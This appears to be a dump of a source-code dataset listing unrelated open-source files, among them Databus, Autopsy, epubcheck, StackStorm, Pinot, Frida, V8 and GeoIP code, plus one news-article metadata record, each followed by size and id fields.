private DatabusV3Registration findV3Registration(DatabusRequest request, String prefix) throws RequestProcessingException
{
String category = request.getParams().getProperty(DatabusRequest.PATH_PARAM_NAME);
String regIdStr = category.substring(prefix.length());
RegistrationId regId = new RegistrationId(regIdStr);
return findV3Registration(regId, request);
}
  /**
   * Immutable (partition, registration id) pair serialized as JSON by the
   * cluster/partition REST endpoints of this request processor.
   */
  private static class PartitionInfo
  {
    // Numeric partition id within the client cluster.
    private final long partition;
    // Id of the registration serving this partition.
    private final RegistrationId regId;
    public long getPartition()
    {
      return partition;
    }
    public RegistrationId getRegId()
    {
      return regId;
    }
    public PartitionInfo(long partition, RegistrationId regId)
    {
      super();
      this.partition = partition;
      this.regId = regId;
    }
  }
  /**
   * Immutable (state, registration id) pair serialized as JSON by the
   * pause/resume REST endpoints.
   */
  private static class RegStatePair
  {
    // Name of the registration's lifecycle state (e.g. "PAUSED").
    private final String _state;
    // Id of the registration the state belongs to.
    private final RegistrationId _regId;
    public String getState()
    {
      return _state;
    }
    public RegistrationId getRegId()
    {
      return _regId;
    }
    // Convenience constructor for V2 registrations: stores the state's name.
    public RegStatePair(DatabusRegistration.RegistrationState state, RegistrationId regId)
    {
      _regId = regId;
      _state = state.name();
    }
    public RegStatePair(String state, RegistrationId regId)
    {
      _regId = regId;
      _state = state;
    }
  }
  /**
   * Immutable, JSON-serializable snapshot of a registration (V2 or V3) exposed
   * by the registration REST endpoints. For multi-partition registrations the
   * per-partition (child) registrations are nested under the parent entry.
   */
  private static class RegInfo
  {
    // Name of the registration's lifecycle state (e.g. "PAUSED").
    private final String state;
    // Unique id of the registration.
    private final RegistrationId regId;
    // String form of the registration's DatabusComponentStatus.
    private final String status;
    // Key-filter configuration; callers pass null for V3 registrations.
    private final DbusKeyCompositeFilterConfig filter;
    // Subscriptions served by this registration.
    private final Collection<DatabusSubscription> subs;
    // True when this is a multi-partition (parent) registration.
    private final boolean isMultiPartition;
    // Per-partition child registrations; null for single-partition entries.
    private final Map<DbusPartitionInfo, RegInfo> childRegistrations;
    public String getState()
    {
      return state;
    }
    public RegistrationId getRegId()
    {
      return regId;
    }
    public String getStatus()
    {
      return status;
    }
    public DbusKeyCompositeFilterConfig getFilter()
    {
      return filter;
    }
    public Collection<DatabusSubscription> getSubs()
    {
      return subs;
    }
    public boolean isMultiPartition()
    {
      return isMultiPartition;
    }
    public Map<DbusPartitionInfo, RegInfo> getChildRegistrations()
    {
      return childRegistrations;
    }
    // Convenience constructor for single-partition registrations.
    public RegInfo(String state,
                   RegistrationId regId,
                   DatabusComponentStatus status,
                   DbusKeyCompositeFilterConfig filter,
                   Collection<DatabusSubscription> subs)
    {
      this(state, regId, status, filter, subs, false, null);
    }
    public RegInfo(String state,
                   RegistrationId regId,
                   DatabusComponentStatus status,
                   DbusKeyCompositeFilterConfig filter,
                   Collection<DatabusSubscription> subs,
                   boolean isMultiPartition,
                   Map<DbusPartitionInfo, RegInfo> childRegistrations)
    {
      super();
      this.state = state;
      this.regId = regId;
      // Only the string form of the status is kept (and serialized).
      this.status = status.toString();
      this.filter = filter;
      this.subs = subs;
      this.isMultiPartition = isMultiPartition;
      this.childRegistrations = childRegistrations;
    }
  }
}
| 18,380
|
1,473
|
/*
* Autopsy Forensic Browser
*
* Copyright 2011-2021 Basis Technology Corp.
* Contact: carrier <at> sleuthkit <dot> org
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.sleuthkit.autopsy.datamodel;
import org.openide.nodes.Sheet;
import org.openide.util.NbBundle;
import org.sleuthkit.autopsy.coreutils.Logger;
import org.sleuthkit.datamodel.VirtualDirectory;
/**
* Node for a virtual directory
*/
/**
 * Node for a virtual directory.
 */
public class VirtualDirectoryNode extends SpecialDirectoryNode {

    private static final Logger logger = Logger.getLogger(VirtualDirectoryNode.class.getName());

    //prefix for special VirtualDirectory root nodes grouping local files
    public final static String LOGICAL_FILE_SET_PREFIX = "LogicalFileSet"; //NON-NLS

    /**
     * Returns the display name to use for the given virtual directory.
     */
    public static String nameForVirtualDirectory(VirtualDirectory ld) {
        return ld.getName();
    }

    public VirtualDirectoryNode(VirtualDirectory ld) {
        super(ld);
        setDisplayName(nameForVirtualDirectory(ld));
        setIconBaseWithExtension("org/sleuthkit/autopsy/images/folder-icon-virtual.png"); //TODO NON-NLS
    }

    @Override
    protected Sheet createSheet() {
        Sheet sheet = super.createSheet();
        Sheet.Set sheetSet = sheet.get(Sheet.PROPERTIES);
        // Drop the location column: virtual directories are not part of the
        // data source, so showing a path would be misleading.
        String locationCol = NbBundle.getMessage(AbstractAbstractFileNode.class, "AbstractAbstractFileNode.locationColLbl");
        for (Property<?> prop : sheetSet.getProperties()) {
            if (locationCol.equals(prop.getName())) {
                sheetSet.remove(prop.getName());
            }
        }
        return sheet;
    }

    @Override
    public <T> T accept(ContentNodeVisitor<T> visitor) {
        return visitor.visit(this);
    }

    @Override
    public <T> T accept(DisplayableItemNodeVisitor<T> visitor) {
        return visitor.visit(this);
    }
}
| 878
|
543
|
package com.adobe.epubcheck.ctc;
import com.adobe.epubcheck.api.Report;
import com.adobe.epubcheck.ctc.epubpackage.EpubPackage;
import com.adobe.epubcheck.opf.DocumentValidator;
/**
* === WARNING ==========================================<br/>
* This class is scheduled to be refactored and integrated<br/>
* in another package.<br/>
* Please keep changes minimal (bug fixes only) until then.<br/>
* ========================================================<br/>
*/
public class EpubCheckContentFactory implements ContentValidator
{
  /** Singleton instance; the factory itself is stateless. */
  private static final EpubCheckContentFactory instance = new EpubCheckContentFactory();

  public static EpubCheckContentFactory getInstance()
  {
    return instance;
  }

  /**
   * Creates the DocumentValidator matching the requested validation type, or
   * null when the type has no associated check.
   */
  @Override
  public DocumentValidator newInstance(Report report, ValidationType vt, EpubPackage epack)
  {
    switch (vt)
    {
      case METADATA_V3:
        return new EpubMetaDataV3Check(epack, report);
      case METADATA_V2:
        return new EpubMetaDataV2Check(epack, report);
      case TEXT:
        // Note: this check takes (report, epack), unlike the others.
        return new EpubTextContentCheck(report, epack);
      case NAV:
        return new EpubNavCheck(epack, report);
      case NCX:
        return new EpubNCXCheck(epack, report);
      case SPINE:
        return new EpubSpineCheck(epack, report);
      case SCRIPT:
        return new EpubScriptCheck(epack, report);
      case SPAN:
        return new EpubSpanCheck(epack, report);
      case LANG:
        return new EpubLangCheck(epack, report);
      case CSS_SEARCH:
        return new EpubCSSCheck(epack, report);
      case LINK:
        return new EpubExtLinksCheck(epack, report);
      case RENDITION:
        return new EpubRenditionCheck(epack, report);
      case CFI:
        return new EpubCfiCheck(epack, report);
      case HTML_STRUCTURE:
        return new EpubHTML5StructureCheck(epack, report);
      case MULTIPLE_CSS:
        return new EpubStyleSheetsCheck(epack, report);
      case EPUB3_STRUCTURE:
        return new Epub3StructureCheck(epack, report);
      case TOC:
        return new EpubTocCheck(epack, report);
      case SVG:
        return new EpubSVGCheck(epack, report);
      default:
        return null;
    }
  }
}
| 1,143
|
4,920
|
<gh_stars>1000+
# Copyright 2020 The StackStorm Authors.
# Copyright 2019 Extreme Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=assignment-from-none
# XXX: This file has a lot of duplication with TriggerWatcher.
# XXX: Refactor.
from __future__ import absolute_import
import six
from kombu.mixins import ConsumerMixin
from st2common import log as logging
from st2common.transport import reactor, publishers
from st2common.transport import utils as transport_utils
from st2common.util import concurrency
import st2common.util.queues as queue_utils
LOG = logging.getLogger(__name__)
class SensorWatcher(ConsumerMixin):
    """
    Consumes Sensor create/update/delete (CUD) events from the message bus
    and dispatches each one to the corresponding registered handler callback.

    The kombu ``ConsumerMixin.run`` loop is executed in a green thread which
    is spawned by :meth:`start` and killed by :meth:`stop`.
    """

    def __init__(
        self, create_handler, update_handler, delete_handler, queue_suffix=None
    ):
        """
        :param create_handler: Function which is called on SensorDB create event.
        :type create_handler: ``callable``

        :param update_handler: Function which is called on SensorDB update event.
        :type update_handler: ``callable``

        :param delete_handler: Function which is called on SensorDB delete event.
        :type delete_handler: ``callable``

        :param queue_suffix: Optional suffix used to build a unique watcher
                             queue name (a random UUID is appended as well).
        """
        # TODO: Handle sensor type filtering using routing key
        self._create_handler = create_handler
        self._update_handler = update_handler
        self._delete_handler = delete_handler
        self._sensor_watcher_q = self._get_queue(queue_suffix)
        self.connection = None
        self._updates_thread = None

        # Map each CUD routing key to its handler so process_task can
        # dispatch on message.delivery_info['routing_key'].
        self._handlers = {
            publishers.CREATE_RK: create_handler,
            publishers.UPDATE_RK: update_handler,
            publishers.DELETE_RK: delete_handler,
        }

    def get_consumers(self, Consumer, channel):
        """ConsumerMixin hook: consume pickled messages off the watcher queue."""
        consumers = [
            Consumer(
                queues=[self._sensor_watcher_q],
                accept=["pickle"],
                callbacks=[self.process_task],
            )
        ]
        return consumers

    def process_task(self, body, message):
        """Dispatch a single message to the handler for its routing key.

        The message is always acked, even when no handler matches or the
        handler raises, so broken messages are not redelivered forever.
        """
        LOG.debug("process_task")
        LOG.debug("     body: %s", body)
        LOG.debug("     message.properties: %s", message.properties)
        LOG.debug("     message.delivery_info: %s", message.delivery_info)

        routing_key = message.delivery_info.get("routing_key", "")
        handler = self._handlers.get(routing_key, None)

        try:
            if not handler:
                LOG.info("Skipping message %s as no handler was found.", message)
                return

            try:
                handler(body)
            except Exception as e:
                # Best-effort: log and keep consuming subsequent messages.
                LOG.exception(
                    "Handling failed. Message body: %s. Exception: %s",
                    body,
                    six.text_type(e),
                )
        finally:
            message.ack()

    def start(self):
        """Connect to the message bus and spawn the consumer loop."""
        try:
            self.connection = transport_utils.get_connection()
            self._updates_thread = concurrency.spawn(self.run)
        except Exception:
            LOG.exception("Failed to start sensor_watcher.")
            # get_connection() itself may have raised, in which case there is
            # no connection to release yet (self.connection is still None).
            if self.connection:
                self.connection.release()

    def stop(self):
        """Kill the consumer green thread, delete the watcher queue and
        release the bus connection."""
        LOG.debug("Shutting down sensor watcher.")
        try:
            if self._updates_thread:
                self._updates_thread = concurrency.kill(self._updates_thread)

            if self.connection:
                channel = self.connection.channel()
                bound_sensor_watch_q = self._sensor_watcher_q(channel)
                try:
                    bound_sensor_watch_q.delete()
                except Exception:
                    LOG.error(
                        "Unable to delete sensor watcher queue: %s",
                        self._sensor_watcher_q,
                    )
        finally:
            if self.connection:
                self.connection.release()

    @staticmethod
    def _get_queue(queue_suffix):
        # Each watcher gets its own uniquely-named queue (random UUID suffix)
        # bound with a catch-all routing key.
        queue_name = queue_utils.get_queue_name(
            queue_name_base="st2.sensor.watch",
            queue_name_suffix=queue_suffix,
            add_random_uuid_to_suffix=True,
        )
        return reactor.get_sensor_cud_queue(queue_name, routing_key="#")
| 2,006
|
343
|
{
"Author": "by <NAME> - Apr 16, 2015 8:02 pm UTC",
"Direction": null,
"Excerpt": "Two-year-old bug exposes thousands of servers to crippling attack.",
"Image": "http:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2015\/04\/server-crash-640x426.jpg",
"Title": "Just-released Minecraft exploit makes it easy to crash game servers",
"SiteName": "Ars Technica"
}
| 137
|
7,746
|
<reponame>jar-ben/z3
/*++
Copyright (c) 2012 Microsoft Corporation
Module Name:
subpaving_mpf.cpp
Abstract:
Subpaving for non-linear arithmetic using multi-precision floats.
Author:
<NAME> (leonardo) 2012-07-31.
Revision History:
--*/
#include "math/subpaving/subpaving_mpf.h"
#include "math/subpaving/subpaving_t_def.h"
// Force explicit instantiation of the subpaving context template for the
// multi-precision float (mpf) configuration, so that its member definitions
// (pulled in via subpaving_t_def.h) are emitted in this translation unit.
template class subpaving::context_t<subpaving::config_mpf>;
| 159
|
1,273
|
"""
Constants that must remain in sync with the companion StreamingProcessController Java
code in GATK. See StreamingToolConstants.java.
"""
"""
Command acknowledgement messages used to signal positive acknowledgement ('ack',
negative acknowledgement ('nck'), and negative acknowledgement with an accompanying
message ('nkm').
"""
_ackString = "ack"
_nackString = "nck"
_nkmString = "nkm"
"""
The length of a message written with a negative ack (nkm) must be 4 bytes long when
serialized as a string, and cannot have a value > 9999.
"""
_nckMessageLengthSerializedSize = 4
_nckMaxMessageLength = 9999
| 163
|
2,144
|
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.pinot.segment.local.io.compression;
import java.io.IOException;
import java.nio.ByteBuffer;
import net.jpountz.lz4.LZ4CompressorWithLength;
import org.apache.pinot.segment.spi.compression.ChunkCompressionType;
import org.apache.pinot.segment.spi.compression.ChunkCompressor;
/**
* Identical to {@code LZ4Compressor} but prefixes the chunk with the
* decompressed length.
*/
/**
 * Chunk compressor that behaves like {@code LZ4Compressor} except that every
 * compressed chunk is prefixed with its decompressed length (via
 * {@link LZ4CompressorWithLength}), allowing decompression without knowing
 * the original size up front.
 */
class LZ4WithLengthCompressor implements ChunkCompressor {

  /** Stateless, therefore shared as a singleton. */
  static final LZ4WithLengthCompressor INSTANCE = new LZ4WithLengthCompressor();

  private final LZ4CompressorWithLength _delegate;

  private LZ4WithLengthCompressor() {
    _delegate = new LZ4CompressorWithLength(LZ4Compressor.LZ4_FACTORY.fastCompressor());
  }

  @Override
  public int compress(ByteBuffer inUncompressed, ByteBuffer outCompressed)
      throws IOException {
    // Delegate the actual compression, then flip the buffer so the caller
    // can read the freshly written chunk from position 0.
    _delegate.compress(inUncompressed, outCompressed);
    outCompressed.flip();
    return outCompressed.limit();
  }

  @Override
  public int maxCompressedSize(int uncompressedSize) {
    // Worst-case bound includes the length prefix added by the delegate.
    return _delegate.maxCompressedLength(uncompressedSize);
  }

  @Override
  public ChunkCompressionType compressionType() {
    return ChunkCompressionType.LZ4_LENGTH_PREFIXED;
  }
}
| 600
|
450
|
<reponame>3vilWind/frida-gum
/*
* Copyright (C) 2013-2018 <NAME> <<EMAIL>>
* Copyright (C) 2021 <NAME> <<EMAIL>>
*
* Licence: wxWindows Library Licence, Version 3.1
*/
#include "gumarmbacktracer.h"
#include "guminterceptor.h"
#include "gummemorymap.h"
/*
 * Instance state: two memory maps used to classify addresses while scanning
 * the stack — "code" tracks executable pages (where valid return addresses
 * must point) and "writable" tracks writable pages (valid stack memory).
 */
struct _GumArmBacktracer
{
  GObject parent;
  GumMemoryMap * code;
  GumMemoryMap * writable;
};

/* Forward declarations for the GObject/GumBacktracer plumbing below. */
static void gum_arm_backtracer_iface_init (gpointer g_iface,
    gpointer iface_data);
static void gum_arm_backtracer_dispose (GObject * object);
static void gum_arm_backtracer_generate (GumBacktracer * backtracer,
    const GumCpuContext * cpu_context, GumReturnAddressArray * return_addresses,
    guint limit);

/* Register the type and advertise the GumBacktracer interface. */
G_DEFINE_TYPE_EXTENDED (GumArmBacktracer,
                        gum_arm_backtracer,
                        G_TYPE_OBJECT,
                        0,
                        G_IMPLEMENT_INTERFACE (GUM_TYPE_BACKTRACER,
                            gum_arm_backtracer_iface_init))
static void
gum_arm_backtracer_class_init (GumArmBacktracerClass * klass)
{
  /* Hook dispose so our memory maps are released with the instance. */
  G_OBJECT_CLASS (klass)->dispose = gum_arm_backtracer_dispose;
}
static void
gum_arm_backtracer_iface_init (gpointer g_iface,
                               gpointer iface_data)
{
  /* Publish our implementation through the GumBacktracer interface vtable. */
  ((GumBacktracerInterface *) g_iface)->generate = gum_arm_backtracer_generate;
}
static void
gum_arm_backtracer_init (GumArmBacktracer * self)
{
  /*
   * Writable pages delimit the stack region we are allowed to scan;
   * executable pages are where candidate return addresses must point.
   */
  self->writable = gum_memory_map_new (GUM_PAGE_WRITE);
  self->code = gum_memory_map_new (GUM_PAGE_EXECUTE);
}
static void
gum_arm_backtracer_dispose (GObject * object)
{
  GumArmBacktracer * self = GUM_ARM_BACKTRACER (object);

  /* dispose may run more than once; g_clear_object tolerates the NULLs. */
  g_clear_object (&self->writable);
  g_clear_object (&self->code);

  /* Chain up to the parent class last, as GObject convention requires. */
  G_OBJECT_CLASS (gum_arm_backtracer_parent_class)->dispose (object);
}
/*
 * Creates a new ARM stack-scanning backtracer.  The returned object
 * implements the GumBacktracer interface; release with g_object_unref().
 */
GumBacktracer *
gum_arm_backtracer_new (void)
{
  return g_object_new (GUM_TYPE_ARM_BACKTRACER, NULL);
}
/*
 * Conservatively scans stack memory for values that look like ARM or Thumb
 * return addresses.  A stack word qualifies when it points into executable
 * memory AND either (a) the interceptor's invocation stack can translate it
 * (i.e. it is a trampoline return address Gum substituted earlier), or
 * (b) the instruction immediately preceding it decodes as a BL/BLX call.
 *
 * cpu_context may be NULL, in which case the current stack pointer is used
 * and the first hit (this function's own frame) is skipped.
 */
static void
gum_arm_backtracer_generate (GumBacktracer * backtracer,
                             const GumCpuContext * cpu_context,
                             GumReturnAddressArray * return_addresses,
                             guint limit)
{
  GumArmBacktracer * self;
  GumInvocationStack * invocation_stack;
  gsize * start_address;
  guint skips_pending, depth, i;
  gsize * p;

  self = GUM_ARM_BACKTRACER (backtracer);
  invocation_stack = gum_interceptor_get_current_stack ();

  if (cpu_context != NULL)
  {
    /* Walk the captured stack pointer; nothing to skip. */
    start_address = GSIZE_TO_POINTER (cpu_context->sp);
    skips_pending = 0;
  }
  else
  {
    /* No context: walk our own stack, skipping this frame's return address. */
    asm ("\tmov %0, sp" : "=r" (start_address));
    skips_pending = 1;
  }

  /* Never report more addresses than the caller's array can hold. */
  depth = MIN (limit, G_N_ELEMENTS (return_addresses->items));

  /* Scan at most 2048 words starting at the stack pointer. */
  for (i = 0, p = start_address; p < start_address + 2048; p++)
  {
    gboolean valid = FALSE;
    gsize value;
    GumMemoryRange vr;

    /* On each 4 KiB page boundary, stop if the next page is not writable,
     * i.e. we have walked off the end of the stack. */
    if ((GPOINTER_TO_SIZE (p) & (4096 - 1)) == 0)
    {
      GumMemoryRange next_range;
      next_range.base_address = GUM_ADDRESS (p);
      next_range.size = 4096;
      if (!gum_memory_map_contains (self->writable, &next_range))
        break;
    }

    value = *p;
    /* The 4 bytes preceding the candidate address must be executable,
     * since that is where the call instruction would live. */
    vr.base_address = value - 4;
    vr.size = 4;

    if (value > 4096 + 4 && gum_memory_map_contains (self->code, &vr))
    {
      gsize translated_value;

      translated_value = GPOINTER_TO_SIZE (gum_invocation_stack_translate (
          invocation_stack, GSIZE_TO_POINTER (value)));
      if (translated_value != value)
      {
        /* It was one of Gum's trampoline return addresses: the translated
         * (real) address is trusted without further decoding. */
        value = translated_value;
        valid = TRUE;
      }
      else
      {
        if (value % 4 == 0)
        {
          /* Word-aligned: ARM mode.  Decode the 32-bit instruction just
           * before the candidate return address. */
          const guint32 insn = GUINT32_FROM_LE (
              *((guint32 *) GSIZE_TO_POINTER (value - 4)));
          if ((insn & 0xf000000) == 0xb000000)
          {
            /* BL <imm24> */
            valid = TRUE;
          }
          else if ((insn & 0xfe000000) == 0xfa000000)
          {
            /* BLX <imm24> */
            valid = TRUE;
          }
          else if ((insn & 0xff000f0) == 0x1200030)
          {
            /* BLX Rx */
            valid = TRUE;
          }
        }
        else if ((value & 1) != 0)
        {
          /* Low bit set: Thumb mode.  Look at the two 16-bit units before
           * the (bit-0-stripped) address. */
          const guint16 * insns_before = GSIZE_TO_POINTER (value - 1 - 2 - 2);
          if ((GUINT16_FROM_LE (insns_before[0]) & 0xf800) == 0xf000 &&
              (GUINT16_FROM_LE (insns_before[1]) & 0xe800) == 0xe800)
          {
            /* BL/BLX <imm11> */
            value--;
            valid = TRUE;
          }
          else if ((GUINT16_FROM_LE (insns_before[1]) & 0xff80) == 0x4780)
          {
            /* BLX Rx */
            value--;
            valid = TRUE;
          }
        }
      }
    }

    if (valid)
    {
      if (skips_pending == 0)
      {
        return_addresses->items[i++] = GSIZE_TO_POINTER (value);
        if (i == depth)
          break;
      }
      else
      {
        /* Discard the hit belonging to our own frame (NULL context case). */
        skips_pending--;
      }
    }
  }

  return_addresses->len = i;
}
| 2,439
|
1,444
|
package org.wiztools.restclient.ui.history;
import java.net.URL;
import org.junit.*;
import static org.junit.Assert.*;
import org.wiztools.restclient.bean.RequestBean;
/**
 * Unit tests for {@code HistoryManagerImpl}: verifies add/back/forward
 * navigation, history truncation when the size limit shrinks, and the
 * maximum-elements cap.
 *
 * @author subwiz
 */
public class HistoryManagerImplTest {
    public HistoryManagerImplTest() {
    }
    @BeforeClass
    public static void setUpClass() throws Exception {
    }
    @AfterClass
    public static void tearDownClass() throws Exception {
    }
    @Before
    public void setUp() {
    }
    @After
    public void tearDown() {
    }
    /**
     * Exercises add/back/forward navigation end-to-end: after navigating
     * back and then forward, adding a new request truncates the "forward"
     * entries, leaving the cursor's history plus the new item.
     */
    @Test
    public void testAll() throws Exception {
        System.out.println("all");
        HistoryManagerImpl instance = new HistoryManagerImpl();
        instance.setHistorySize(HistoryManager.DEFAULT_HISTORY_SIZE);
        // Seed the history with 10 distinct requests.
        for(int i=0; i<10; i++) {
            RequestBean request = new RequestBean();
            request.setUrl(new URL("http://localhost/" + i));
            instance.add(request);
        }
        assertTrue(instance.isMostRecent());
        System.out.println("Current after 10 additions: " + instance.current());
        // Walk all the way back to the oldest entry...
        for(int i=0; i<10; i++) {
            instance.back();
        }
        assertTrue(instance.isOldest());
        System.out.println("Current after 10 backs: " + instance.current());
        // ...then forward again to the middle of the history.
        for(int i=0; i<5; i++) {
            instance.forward();
        }
        System.out.println("Current after 5 forwards: " + instance.current());
        System.out.println("Cursor position: " + instance.cursor());
        // Adding from mid-history drops the entries ahead of the cursor.
        RequestBean request = new RequestBean();
        request.setUrl(new URL("http://localhost/NEW"));
        instance.add(request);
        assertEquals(7, instance.size());
        System.out.println(instance);
    }
    /**
     * Shrinking the history size limit truncates existing entries.
     */
    @Test
    public void testSetHistorySize() throws Exception {
        System.out.println("setHistorySize");
        HistoryManagerImpl instance = new HistoryManagerImpl();
        instance.setHistorySize(HistoryManager.DEFAULT_HISTORY_SIZE);
        for(int i=0; i<10; i++) {
            RequestBean request = new RequestBean();
            request.setUrl(new URL("http://localhost/" + i));
            instance.add(request);
        }
        instance.setHistorySize(5);
        assertEquals(5, instance.size());
    }
    /**
     * Adding more requests than the configured limit keeps only the
     * most recent {@code historySize} entries.
     */
    @Test
    public void testMaxElements() throws Exception {
        System.out.println("maxElements");
        HistoryManagerImpl instance = new HistoryManagerImpl();
        instance.setHistorySize(HistoryManager.DEFAULT_HISTORY_SIZE);
        instance.setHistorySize(9);
        for(int i=0; i<10; i++) {
            RequestBean request = new RequestBean();
            request.setUrl(new URL("http://localhost/" + i));
            instance.add(request);
        }
        System.out.println("Elements in History: " + instance);
        assertEquals(9, instance.size());
    }
}
| 1,294
|
3,056
|
<reponame>siemenstutorials/stairspeedtest-reborn<gh_stars>1000+
#ifndef GEOIP_H_INCLUDED
#define GEOIP_H_INCLUDED
#include <string>

// Result of a GeoIP lookup for a single IP address.  All fields are plain
// strings as returned by the lookup service; fields the service did not
// report are presumably left empty — TODO confirm against the implementation.
struct geoIPInfo
{
    std::string ip;              // the IP address that was looked up
    std::string country_code;    // e.g. two-letter country code
    std::string country;
    std::string region_code;
    std::string region;
    std::string city;
    std::string postal_code;
    std::string continent_code;
    std::string latitude;        // latitude/longitude kept as strings
    std::string longitude;
    std::string organization;
    std::string asn;             // autonomous system number
    std::string timezone;
};

// Performs a GeoIP lookup for `ip`, routing the request through `proxy`
// (NOTE(review): empty string likely means "no proxy" — verify in the .cpp).
geoIPInfo getGeoIPInfo(const std::string &ip, const std::string &proxy);

#endif // GEOIP_H_INCLUDED
| 236
|
5,964
|
<reponame>wenfeifei/miniblink49
// Copyright 2015 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "src/runtime/runtime-utils.h"
#include "src/arguments.h"
#include "src/objects-inl.h"
namespace v8 {
namespace internal {
// Returns true when the for-in enumeration cursor |index| has reached
// |length|, i.e. iteration is complete.  Both arguments are Smis.
RUNTIME_FUNCTION(Runtime_ForInDone) {
  SealHandleScope scope(isolate);
  DCHECK_EQ(2, args.length());
  CONVERT_SMI_ARG_CHECKED(index, 0);
  CONVERT_SMI_ARG_CHECKED(length, 1);
  DCHECK_LE(0, index);
  DCHECK_LE(index, length);
  return isolate->heap()->ToBoolean(index == length);
}
// Filters a single for-in key: converts |key| to a Name and returns it if
// |receiver| still has that property, otherwise returns undefined (the
// property was deleted/shadowed during iteration).  Propagates exceptions
// from ToName/HasProperty.
RUNTIME_FUNCTION(Runtime_ForInFilter) {
  HandleScope scope(isolate);
  DCHECK_EQ(2, args.length());
  CONVERT_ARG_HANDLE_CHECKED(JSReceiver, receiver, 0);
  CONVERT_ARG_HANDLE_CHECKED(Object, key, 1);
  // TODO(turbofan): Fast case for array indices.
  Handle<Name> name;
  if (!Object::ToName(isolate, key).ToHandle(&name)) {
    return isolate->heap()->exception();
  }
  Maybe<bool> result = JSReceiver::HasProperty(receiver, name);
  if (!result.IsJust()) return isolate->heap()->exception();
  if (result.FromJust()) return *name;
  return isolate->heap()->undefined_value();
}
// Fetches the key at |index| from the enumeration cache and, when the
// receiver's map no longer matches |cache_type| (and it is not a proxy,
// signalled by Smi 0), re-filters the key exactly like Runtime_ForInFilter
// above — the filtering tail is deliberately duplicated from it.
RUNTIME_FUNCTION(Runtime_ForInNext) {
  HandleScope scope(isolate);
  DCHECK_EQ(4, args.length());
  CONVERT_ARG_HANDLE_CHECKED(JSReceiver, receiver, 0);
  CONVERT_ARG_HANDLE_CHECKED(FixedArray, cache_array, 1);
  CONVERT_ARG_HANDLE_CHECKED(Object, cache_type, 2);
  CONVERT_SMI_ARG_CHECKED(index, 3);
  Handle<Object> key = handle(cache_array->get(index), isolate);
  // Don't need filtering if expected map still matches that of the receiver,
  // and neither for proxies.
  if (receiver->map() == *cache_type || *cache_type == Smi::FromInt(0)) {
    return *key;
  }
  // TODO(turbofan): Fast case for array indices.
  Handle<Name> name;
  if (!Object::ToName(isolate, key).ToHandle(&name)) {
    return isolate->heap()->exception();
  }
  Maybe<bool> result = JSReceiver::HasProperty(receiver, name);
  if (!result.IsJust()) return isolate->heap()->exception();
  if (result.FromJust()) return *name;
  return isolate->heap()->undefined_value();
}
// Advances the for-in enumeration cursor by one and returns it as a Smi.
RUNTIME_FUNCTION(Runtime_ForInStep) {
  SealHandleScope scope(isolate);
  DCHECK_EQ(1, args.length());
  CONVERT_SMI_ARG_CHECKED(index, 0);
  DCHECK_LE(0, index);
  // Must stay below Smi::kMaxValue so index + 1 still fits in a Smi.
  DCHECK_LT(index, Smi::kMaxValue);
  return Smi::FromInt(index + 1);
}
} // namespace internal
} // namespace v8
| 899
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.